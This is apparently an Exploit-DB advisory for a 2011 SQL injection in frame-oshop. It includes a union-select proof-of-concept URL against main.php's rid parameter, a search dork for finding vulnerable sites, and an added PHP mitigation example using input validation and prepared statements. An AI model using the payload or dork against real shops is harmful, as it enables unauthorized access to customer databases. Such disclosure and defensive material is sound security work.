Vendor: frame-oshop
By: -SmoG-
CVSS: 7.5 HIGH
CWE: 89 (SQL Injection)
Product Name: frame-oshop
Affected Version From: i dunno...
Affected Version To: i dunno...
Patch Exists: NO
2011

frame-oshop 0day

frame-oshop is vulnerable to SQL injection. An attacker can exploit the flaw by sending a crafted HTTP request that carries the payload in a URL parameter (the PoC uses the `rid` parameter of `main.php`). The payload can be used to extract sensitive information from the database.

Mitigation:

Validate all user input before it is used in a query to prevent SQL injection. Sanitizing user input is also recommended.
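
One way to apply this mitigation to a numeric parameter such as `rid`, as an added example that is not frame-oshop's own code: the value is validated as an integer and then bound through a prepared statement, so it never becomes part of the SQL text. The function names, the `rubrik` table schema and the in-memory SQLite database are assumptions (PHP 8 with pdo_sqlite).

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the lookup behind main.php?show=rubrik&rid=...
// Schema (table `rubrik`, columns `id`, `name`) is assumed, not frame-oshop's.

/** Accept only a positive decimal integer; anything else yields null. */
function parseRid(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (rid[]=1) and missing values are rejected
    }
    $rid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $rid === false ? null : $rid;
}

/** Look up one category row; the id is bound, never concatenated. */
function findRubrik(PDO $db, int $rid): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM rubrik WHERE id = :rid');
    $stmt->bindValue(':rid', $rid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rubrik (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO rubrik (id, name) VALUES (1, 'Books'), (2, 'Music')");

// Constructed inputs; the last one is the URL-decoded rid value from this page's PoC.
$inputs = ['1', '2', '99', '1abc', ['1'],
           '-1 union select 1,2,3,4,version(),6,7,8,9,10,11,12'];

foreach ($inputs as $raw) {
    $label = is_string($raw) ? $raw : 'array';
    $rid = parseRid($raw);
    if ($rid === null) {
        echo "rid={$label}: rejected (400)\n"; // never reaches the database
        continue;
    }
    $row = findRubrik($db, $rid);
    echo "rid={$label}: " . ($row === null ? 'not found (404)' : $row['name']) . "\n";
}
```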
Source

Exploit-DB raw data:

product:	frame-oshop
vendor:		http://www.sdaxx.de/
date:		15.05.2011
status:		0day
version:	i dunno...

PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12

Dork: 		"2006 by Sdaxx Rostock" intitle:"frame-oshop"

Note:		-sessid had to be fresh
		-there are more vuln...

>>published by -SmoG- on SceneGround.info<<


gretz to my mentor Therion, c0x and other sg-members!